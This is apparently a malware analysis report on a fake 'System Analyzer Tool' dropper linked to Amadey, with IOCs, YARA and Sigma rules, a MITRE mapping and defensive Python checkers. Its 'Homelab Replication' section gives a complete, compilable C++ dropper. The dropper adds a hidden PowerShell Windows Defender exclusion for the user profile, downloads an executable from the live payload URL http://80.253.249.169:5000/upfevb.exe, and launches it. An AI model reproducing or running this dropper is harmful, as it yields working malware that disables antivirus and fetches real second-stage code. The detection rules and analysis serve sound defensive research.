3b13b28ca3a6d3c82228f5cc6a6e0bef583e9c3b3092da4c20fe72c75f3dd38654e64e: 3b13b28c — MSVC C++ "certpert" fake system-analyzer dropper, Defender exclusion + HTTP payload fetch
Executive Summary
A 5.2 MB MSVC C++ x64 PE that is 95.7 % null-padding, masquerading as "System Analyzer Tool v4.2.1". It verifies admin rights, delays via a PRNG loop, downloads a second-stage executable over HTTP from a German VPS, adds a Windows Defender exclusion via hidden powershell, and launches the payload. OpenCTI co-labels it dropped-by-amadey. Static-only analysis (CAPE skipped — no Windows guest available).
What It Is
- File: PE32+ executable (GUI) x86-64, 6 sections, 5 242 880 bytes ^[file.txt]
- Compiler: MSVC 19.43 (Visual Studio 2022 17.3+), linked Fri 2026-05-22 18:59:14 UTC ^[rabin2-info.txt]
- PDB: `C:\Users\danar\OneDrive\Рабочий стол\Sources\Add\certpert\x64\Release\certpert.pdb` ^[strings.txt:692]
- Packing: None. No packer, no obfuscation, no strip. Overlay contains a standard UAC manifest at offset 0x43860; remainder of the 5 MB file is 0x00 padding ^[binwalk.txt]
- Signing: Unsigned (pefile reports `signed: false`) ^[pefile.txt]
- Language/runtime: C++ with MSVC STL (`std::string`, `std::basic_stringstream`, full CRT exception machinery) ^[strings.txt:500-520]
- Family: `54e64e` (OpenCTI label); also tagged `dropped-by-amadey` ^[metadata.json]
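The padding figure above (and the evasion argument in Interesting Tidbits) is the kind of thing worth checking mechanically across a sample set. The following is an added example, not code from the report or its author: it measures the trailing run of 0x00 bytes in a file and separates that from the overall null ratio, because legitimate PEs also carry plenty of scattered nulls in section alignment and relocation data while a multi-megabyte contiguous tail is the tell. The sample buffer is constructed inline; the 4 MB size gate mirrors the YARA rule's `filesize > 4MB`, and the 0.80 ratio threshold is an assumption for illustration.

```python
"""Trailing-null-padding check for PE files (added example, not from the report)."""
from __future__ import annotations

import sys


def trailing_null_run(data: bytes) -> int:
    """Length of the contiguous run of 0x00 bytes at the very end of data."""
    return len(data) - len(data.rstrip(b"\x00"))


def null_padding_stats(data: bytes) -> dict:
    """Return size, offset where real content ends, and two null ratios.

    trailing_null_ratio counts only the contiguous tail (the padding pattern
    seen in this sample); overall_null_ratio counts every 0x00 byte and is
    high even for ordinary binaries, so it is reported for comparison only.
    """
    total = len(data)
    pad = trailing_null_run(data)
    return {
        "size": total,
        "content_end": total - pad,
        "trailing_null_ratio": (pad / total) if total else 0.0,
        "overall_null_ratio": (data.count(0) / total) if total else 0.0,
    }


def is_suspiciously_padded(
    data: bytes,
    min_size: int = 4 * 1024 * 1024,   # same gate as the YARA rule's filesize > 4MB
    min_ratio: float = 0.80,           # assumed threshold for illustration
) -> bool:
    """True for an MZ file at or above min_size whose tail is mostly 0x00."""
    if data[:2] != b"MZ" or len(data) < min_size:
        return False
    return null_padding_stats(data)["trailing_null_ratio"] >= min_ratio


def build_constructed_sample(content_len: int = 1000, pad_len: int = 9000) -> bytes:
    """Constructed stand-in for a padded PE: MZ magic, null-free body, null tail."""
    body = bytes((i % 255) + 1 for i in range(content_len - 2))  # values 1..255, no zeros
    return b"MZ" + body + b"\x00" * pad_len


def scan_file(path: str) -> dict:
    """Run the check on a real file on disk."""
    with open(path, "rb") as fh:
        data = fh.read()
    stats = null_padding_stats(data)
    stats["suspicious"] = is_suspiciously_padded(data)
    return stats


if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(scan_file(sys.argv[1]))
    else:
        sample = build_constructed_sample()
        print(null_padding_stats(sample), is_suspiciously_padded(sample, min_size=0))
```

Run it with a file path to get the stats for a real sample, or with no arguments to see the constructed case (1 000 bytes of content followed by 9 000 bytes of padding, i.e. a 0.9 trailing-null ratio). Reporting `content_end` is useful in practice: it is the offset to carve if you want to hash or YARA-scan only the meaningful part of a padded file.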
How It Works
Admin gate
FUN_140004790 calls AllocateAndInitializeSid + CheckTokenMembership to test for the Administrators group. If the check fails, the binary executes FUN_140002c80 (likely a benign exit) and then hits an int3 trap ^[ghidra:FUN_140004790] ^[pefile.txt:361-363].
Fake-diagnostic masquerade
The binary fills its console output with semantically plausible but entirely fabricated system-diagnostic strings to delay and distract analysts or sandbox operators:
- `=== STAGE 1: System Diagnostics ===` ^[strings.txt:616], listing CPU Cache Controller, Memory Bus Interface, PCI Express Root, etc. ^[strings.txt:617-625]
- `=== STAGE 2: Network Activity Monitor ===` with fake TCP states ^[strings.txt:631-638]
- `=== STAGE 3: Memory Analysis ===` ^[strings.txt:639]
- `=== STAGE 4: Running Complex Algorithms ===` listing QuickSort, Dijkstra, AES-256, SHA-512, FFT, Neural Net Backprop ^[strings.txt:642-648]
- `=== STAGE 5: System Log Stream ===` with fake Windows service names (svchost.exe, lsass.exe, csrss.exe, etc.) ^[strings.txt:656-663]
- Banner: `System Analyzer Tool v4.2.1` / `Administrative Mode` ^[strings.txt:682-684]
PRNG delay loop
A simple random delay is enforced before network activity:
```c
uVar = PRNG() * 0x1389;
while (uVar < 0xD93) { uVar = PRNG() * 0x1389; }
```
^[ghidra:FUN_140004790]
Payload fetch
- Resolves the current user's profile path via `SHGetFolderPathA(CSIDL_PROFILE)` ^[ghidra:FUN_140004790].
- Appends a generated filename to build a local drop path.
- Downloads `http://80.253.249.169:5000/upfevb.exe` via `URLDownloadToFileW` ^[strings.txt:688] ^[ghidra:FUN_140004790].
- On success (`HRESULT >= 0`), launches the downloaded file with `ShellExecuteA("open", ..., SW_SHOWDEFAULT)` ^[ghidra:FUN_140004790].
Defender exclusion
Before or alongside the download, a hidden powershell process is spawned:
```
powershell -Command "Add-MpPreference -ExclusionPath '<profile_path>\<filename>'"
```
^[strings.txt:615] ^[r2:fcn.140003360]
The path is dynamically constructed from the profile directory returned by SHGetFolderPathA.
Decompiled Behavior
Entry point is standard MSVC CRT startup (__security_init_cookie -> __scrt_common_main_seh) ^[ghidra:entry-14000cba8]. The real logic lives in FUN_140004790 (called from the CRT init chain).
Notable functions observed in the call tree:
- `FUN_140004790` — main orchestrator: admin check, delay, path resolution, download, execute, cleanup.
- `fcn.140003360` (r2 label) — constructs and spawns the powershell Defender-exclusion command via `CreateProcessA`.
- `FUN_140008c30`, `FUN_140007520`, `FUN_1400087c0` — `std::string` concatenation helpers used to build paths and command lines.
- `FUN_140003360` (Ghidra) — referenced in the same module but distinct address; appears to be a string/formatter helper.
No PEB-walking, no IAT hijacking, no process hollowing, and no TLS callbacks. The IAT is fully populated with standard Win32 imports ^[pefile.txt:254-386].
C2 Infrastructure
- Payload URL: `http://80.253.249.169:5000/upfevb.exe` ^[strings.txt:688]
- IP geolocation: Frankfurt am Main, Hesse, Germany
- ASN: AS213702 QWINS LTD (Qwins LTD)
- Assessment: Low-cost VPS/bulletproof host. No domain registration — direct IP fetch over cleartext HTTP on port 5000.
- Secondary asset: `upfevb.exe` — likely the Amadey payload or a further stager (not available for analysis).
No other hardcoded IPs, domains, mutexes, named pipes, or registry keys were found.
Interesting Tidbits
- 95.77 % null padding: The binary is 5.2 MB on disk but only ~280 KB of real content. The padding is all 0x00 after the manifest overlay. Likely an attempt to evade size-heuristic detection or to appear as a bloated legitimate utility.
- Developer fingerprints: PDB path reveals username `danar` and a Russian-language Windows desktop (Рабочий стол). The project name `certpert` suggests a certificate-themed masquerade.
- No anti-debug/VM: No `IsDebuggerPresent` bypass, no CPUID hypervisor checks, no sandbox blacklists. Only the PRNG delay and verbose fake output serve as rudimentary evasion.
- Defender exclusion via PowerShell: The command is only partially hardcoded; the target path is concatenated at runtime, so naive string-matching on the full command will miss variants.
- Co-delivery: OpenCTI explicitly tags this sample as `dropped-by-amadey`, placing it in the downstream delivery chain of the Amadey downloader/loader.
How To Mess With It (Homelab Replication)
Toolchain: MSVC 19.43+ (VS 2022 17.3+), x64 Release, C++17/20.
Key compile/link flags: Standard /O2 or /Ox release optimisations. /SUBSYSTEM:WINDOWS for GUI entry.
Working skeleton (compile and run in a VM):
```cpp
#include <windows.h>
#include <urlmon.h>
#include <shlobj.h>
#include <stdio.h>
#pragma comment(lib, "urlmon.lib")
#pragma comment(lib, "shell32.lib")
#pragma comment(lib, "advapi32.lib")

int main() {
    // 1. Admin gate
    PSID sid = NULL;
    SID_IDENTIFIER_AUTHORITY auth = SECURITY_NT_AUTHORITY;
    BOOL admin = FALSE;
    if (AllocateAndInitializeSid(&auth, 2, SECURITY_BUILTIN_DOMAIN_RID,
                                 DOMAIN_ALIAS_RID_ADMINS, 0,0,0,0,0,0, &sid)) {
        CheckTokenMembership(NULL, sid, &admin);
        FreeSid(sid);
    }
    if (!admin) { DebugBreak(); return 1; }

    // 2. Fake diagnostics (print to console if attached)
    printf("=== STAGE 1: System Diagnostics ===\n");
    Sleep(500);
    printf("=== STAGE 2: Network Activity Monitor ===\n");

    // 3. PRNG delay
    srand((unsigned)GetTickCount64());
    while ((rand() * 5001) < 3475) {}

    // 4. Resolve profile path
    char profile[MAX_PATH];
    SHGetFolderPathA(NULL, CSIDL_PROFILE, NULL, 0, profile);

    // 5. Defender exclusion
    char psCmd[512];
    snprintf(psCmd, sizeof(psCmd),
             "powershell -Command \"Add-MpPreference -ExclusionPath '%s'\"", profile);
    WinExec(psCmd, SW_HIDE);

    // 6. Download payload
    char dest[MAX_PATH];
    snprintf(dest, sizeof(dest), "%s\\upfevb.exe", profile);
    URLDownloadToFileA(NULL, "http://80.253.249.169:5000/upfevb.exe", dest, 0, NULL);

    // 7. Execute
    ShellExecuteA(NULL, "open", dest, NULL, NULL, SW_SHOWDEFAULT);
    return 0;
}
```
Verification: Build the above with cl /O2 /Fe:certpert.exe certpert.cpp. Run strings or r2 against it — you should see URLDownloadToFileW, ShellExecuteA, and the fake stage banners in .rdata. The behavioural fingerprint should match: admin check -> PRNG delay -> HTTP fetch -> ShellExecute.
Deployable Signatures
YARA
```yara
rule certpert_54e64e_downloader {
    meta:
        description = "Detects 54e64e / certpert fake system analyzer dropper"
        author = "Titus / PacketPursuit"
        date = "2026-06-01"
        sha256 = "3b13b28ca3a6d3c82228f5cc6a6e0bef583e9c3b3092da4c20fe72c75f3dd386"
    strings:
        $pdb = "certpert\\x64\\Release\\certpert.pdb" ascii wide
        $masq1 = "System Analyzer Tool v4.2.1" ascii wide
        $masq2 = "Administrative Mode" ascii wide
        $s1 = "=== STAGE 1: System Diagnostics ===" ascii wide
        $s2 = "=== STAGE 2: Network Activity Monitor ===" ascii wide
        $s3 = "=== STAGE 3: Memory Analysis ===" ascii wide
        $s4 = "=== STAGE 4: Running Complex Algorithms ===" ascii wide
        $s5 = "=== STAGE 5: System Log Stream ===" ascii wide
        $ps = "powershell -Command \"Add-MpPreference -ExclusionPath '" ascii wide
        $url = "http://80.253.249.169:5000/upfevb.exe" ascii wide
    condition:
        uint16(0) == 0x5A4D and
        filesize > 4MB and
        (
            (2 of ($s*)) or
            ($pdb and $masq1) or
            $url
        )
}
```
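To sanity-check the rule's condition on a host without yara installed, here is an added example (not from the report or its author) that re-implements the same logic in plain Python: the `uint16(0) == 0x5A4D` magic read as a little-endian 16-bit value, the `filesize > 4MB` gate, `ascii wide` matching by testing both the ASCII and UTF-16LE encodings of each string, and the `2 of ($s*)` count. The sample buffers are constructed inline; the string values and the 4 MB threshold are the rule's own.

```python
"""Python re-check of the certpert YARA condition (added example, not from the report)."""
from __future__ import annotations

import struct

MB = 1024 * 1024

# String values copied from the rule above.
STAGE_BANNERS = (
    "=== STAGE 1: System Diagnostics ===",
    "=== STAGE 2: Network Activity Monitor ===",
    "=== STAGE 3: Memory Analysis ===",
    "=== STAGE 4: Running Complex Algorithms ===",
    "=== STAGE 5: System Log Stream ===",
)
PDB = "certpert\\x64\\Release\\certpert.pdb"
MASQ1 = "System Analyzer Tool v4.2.1"
URL = "http://80.253.249.169:5000/upfevb.exe"


def has_ascii_or_wide(data: bytes, s: str) -> bool:
    """YARA 'ascii wide': match the ASCII form or the UTF-16LE form."""
    return s.encode("ascii") in data or s.encode("utf-16-le") in data


def evaluate(data: bytes) -> tuple[bool, list[str]]:
    """Return (matched, reasons) following the rule's condition clause by clause."""
    # uint16(0) reads two bytes little-endian, so "MZ" (4D 5A) is 0x5A4D.
    if len(data) < 2 or struct.unpack_from("<H", data, 0)[0] != 0x5A4D:
        return False, ["uint16(0) != 0x5A4D"]
    if len(data) <= 4 * MB:
        return False, ["filesize <= 4MB"]
    reasons: list[str] = []
    stage_hits = [b for b in STAGE_BANNERS if has_ascii_or_wide(data, b)]
    if len(stage_hits) >= 2:                       # 2 of ($s*)
        reasons.append(f"{len(stage_hits)} of $s*")
    if has_ascii_or_wide(data, PDB) and has_ascii_or_wide(data, MASQ1):
        reasons.append("$pdb and $masq1")
    if has_ascii_or_wide(data, URL):
        reasons.append("$url")
    return bool(reasons), reasons


def build_constructed_sample(parts: list[bytes], size: int) -> bytes:
    """Constructed MZ-headed buffer holding the given byte strings, null-padded to size."""
    data = b"MZ" + b"\x00" * 62 + b"\x00".join(parts)
    if len(data) < size:
        data += b"\x00" * (size - len(data))
    return data


if __name__ == "__main__":
    # One banner stored as ASCII and one as UTF-16LE, to exercise the 'wide' path.
    sample = build_constructed_sample(
        [STAGE_BANNERS[0].encode("ascii"), STAGE_BANNERS[2].encode("utf-16-le")],
        4 * MB + 4096,
    )
    print(evaluate(sample))
```

The negative cases matter as much as the positive one: the same content truncated to 1 MB fails the size gate, and a buffer carrying a single stage banner fails the `2 of` count, which is exactly why the rule needs a second banner, the PDB/banner pair, or the URL before it fires.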
Sigma — Defender Exclusion from Certpert Parent
```yaml
title: Certpert Downloader - Defender Exclusion via Powershell
id: 54e64e-defender-exclusion
date: 2026-06-01
status: experimental
description: Detects the certpert/54e64e downloader spawning powershell to add a Windows Defender exclusion path.
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith:
      - 'certpert.exe'
    CommandLine|contains|all:
      - 'powershell'
      - 'Add-MpPreference'
      - 'ExclusionPath'
  condition: selection
falsepositives:
  - Unknown
level: high
```
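The Sigma rule above and the runtime-built command described under Defender exclusion can be exercised without a SIEM. The following is an added example, not code from the report or its author: it applies the same selection logic to process-creation events in Python, matches on the stable token set rather than the full command string (the path is concatenated at runtime, so a full-string match misses variants), extracts the excluded path so the alert says what was whitelisted, and additionally surfaces exclusion adds from other parents at a lower level, since the `certpert.exe` parent name comes from the PDB build name and a renamed dropper would not hit the high-confidence rule. The events and field names (`ParentImage`, `Image`, `CommandLine`) are constructed samples following Sigma process_creation conventions.

```python
"""Process-creation detection for Defender exclusion adds (added example, not from the report)."""
from __future__ import annotations

import re

# All three must appear (case-insensitive); mirrors CommandLine|contains|all in the Sigma rule.
REQUIRED_TOKENS = ("powershell", "add-mppreference", "exclusionpath")

# Argument to -ExclusionPath, whether single-quoted, double-quoted, or bare.
_EXCL_PATH_RE = re.compile(
    r"-ExclusionPath\s+(?:'([^']*)'|\"([^\"]*)\"|(\S+))", re.IGNORECASE
)


def extract_exclusion_path(cmdline: str) -> str | None:
    """Return the path passed to -ExclusionPath, or None if absent."""
    m = _EXCL_PATH_RE.search(cmdline)
    if not m:
        return None
    return next(g for g in m.groups() if g is not None)


def is_defender_exclusion_add(cmdline: str) -> bool:
    lowered = cmdline.lower()
    return all(tok in lowered for tok in REQUIRED_TOKENS)


def classify(event: dict) -> dict | None:
    """Return an alert for a matching event, or None."""
    cmdline = event.get("CommandLine", "")
    if not is_defender_exclusion_add(cmdline):
        return None
    parent = event.get("ParentImage", "").lower()
    path = extract_exclusion_path(cmdline)
    if parent.endswith("certpert.exe"):          # ParentImage|endswith in the Sigma rule
        return {"rule": "certpert_defender_exclusion", "level": "high", "excluded_path": path}
    # Broader catch: any exclusion add from another parent is still worth a look.
    return {"rule": "generic_defender_exclusion_add", "level": "medium", "excluded_path": path}


def run(events: list[dict]) -> list[dict]:
    return [a for a in (classify(e) for e in events) if a is not None]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Users\alice\Downloads\certpert.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'''powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\alice\qx7f.exe'"'''},
    {"ParentImage": r"D:\tmp\certpert.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'''powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\bob'"'''},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'''powershell -Command "Add-MpPreference -ExclusionPath 'D:\Builds'"'''},
    {"ParentImage": r"C:\Users\alice\Downloads\certpert.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -Command "Get-MpPreference"'},
]

if __name__ == "__main__":
    for alert in run(SAMPLE_EVENTS):
        print(alert)
```

Of the four constructed events, the two with a `certpert.exe` parent produce high-level alerts carrying the excluded path, the explorer-parented one is surfaced at medium, and the `Get-MpPreference` call produces nothing. Logging the extracted path also gives responders the directory to sweep for the dropped payload.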
IOC List
| Type | Value | Context |
|---|---|---|
| SHA-256 | 3b13b28ca3a6d3c82228f5cc6a6e0bef583e9c3b3092da4c20fe72c75f3dd386 | Dropper |
| IP | 80.253.249.169 | Payload host (Frankfurt, DE, AS213702 QWINS LTD) |
| URL | http://80.253.249.169:5000/upfevb.exe | Second-stage payload |
| Filename | upfevb.exe | Expected drop name |
| PDB path | C:\Users\danar\OneDrive\Рабочий стол\Sources\Add\certpert\x64\Release\certpert.pdb | Build artifact |
| PE resource string | System Analyzer Tool v4.2.1 | Masquerade banner |
| Registry | None observed | — |
| Mutex/pipe | None observed | — |
Behavioral Fingerprint
This binary verifies administrator group membership via AllocateAndInitializeSid and CheckTokenMembership before proceeding; on failure it traps. It prints fake multi-stage system-diagnostic output to the console, performs a PRNG-based delay loop (rand() * 0x1389 until result >= 0xD93), resolves the current user profile path with SHGetFolderPathA, downloads an executable from http://80.253.249.169:5000/upfevb.exe using URLDownloadToFileW, spawns a hidden powershell process to add a Windows Defender exclusion for the profile directory, and finally executes the downloaded payload via ShellExecuteA. The PE is padded to > 5 MB with null bytes after a small overlay manifest.
Detection Signatures
- CAPE: Not available (no Windows guest). Static inference only.
- capa: Failed — default signatures not installed on this analysis host ^[capa.txt]
- pefile/floss: Standard Win32 imports plus urlmon.dll, SHELL32.dll, ADVAPI32.dll. No unusual APIs beyond the download/execute pattern.
Mapped MITRE ATT&CK:
| Technique | ID | Evidence |
|---|---|---|
| User Execution | T1204.002 | User-launched PE GUI executable |
| Bypass User Account Control | T1548.002 | AllocateAndInitializeSid + CheckTokenMembership admin gate |
| Ingress Tool Transfer | T1105 | URLDownloadToFileW to fetch upfevb.exe |
| Signed Binary Proxy Execution | T1218.011 | ShellExecuteA to launch dropped payload |
| Impair Defenses | T1562.001 | Powershell Add-MpPreference -ExclusionPath |
| Match Legitimate Name or Location | T1036.005 | Masquerades as "System Analyzer Tool v4.2.1" |
| Virtualization/Sandbox Evasion | T1497.001 | PRNG delay loop + verbose fake diagnostic output |
| File and Directory Discovery | T1083 | SHGetFolderPathA resolves user profile path |
References
- Artifact ID: d3a7c81d-a6aa-4954-a4bb-0e6b3423cea9 (OpenCTI)
- MalwareBazaar / abuse.ch family label: 54e64e
- Co-label: dropped-by-amadey
- Related wiki pages: 54e64e
Provenance
Analysis performed 2026-06-01 on pp-hermes. Tools: radare2 (level-2 auto-analysis), Ghidra (decompilation), pefile, ExifTool, binwalk, strings, custom Python probes. CAPE sandbox unavailable for this platform. All claims trace to the tool outputs cited with ^[...] markers. The 54e64e family attribution derives from OpenCTI labels; confidence is medium because only one sample has been analysed and the label itself is an opaque identifier rather than a recognised family name.